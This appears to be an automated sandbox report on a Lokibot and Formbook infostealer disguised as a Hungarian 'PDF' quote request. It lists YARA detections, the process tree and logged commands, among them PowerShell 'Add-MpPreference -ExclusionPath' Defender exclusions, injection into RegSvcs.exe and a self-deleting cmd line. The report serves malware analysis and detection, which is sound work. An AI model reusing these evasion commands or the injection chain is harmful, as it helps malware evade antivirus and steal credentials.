Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: YLc7afPlL4RjCeK.exe PID: 7524, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7700, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: chkdsk.exe PID: 7864, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Ajanlatkeres_2024.05.29.PDF.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YLc7afPlL4RjCeK.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	Security API names: _0020.SetAccessControl
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	Security API names: _0020.AddAccessRule
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, h2df4pn6d2N4C8egS2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	Security API names: _0020.SetAccessControl
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	Security API names: _0020.AddAccessRule
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.cs	Security API names: _0020.SetAccessControl
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, xFLBrsOc76AdDA34nm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, xFLBrsOc76AdDA34nm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ef3384.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 14.2.YLc7afPlL4RjCeK.exe.2fe337c.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ee336c.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 14.2.YLc7afPlL4RjCeK.exe.2fd3364.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.6fb0000.7.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/15@13/8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 15_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

15_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 15_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

15_2_0040434D

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ajanlatkeres_2024.05.29.PDF.exe.log

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

File created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe

Source: Ajanlatkeres_2024.05.29.PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ajanlatkeres_2024.05.29.PDF.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Ajanlatkeres_2024.05.29.PDF.exe

ReversingLabs: Detection: 28%

Source: Ajanlatkeres_2024.05.29.PDF.exe

String found in binary or memory: -------------------------------------ADD Student Record-------------------------------------

Source: unknown	Process created: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
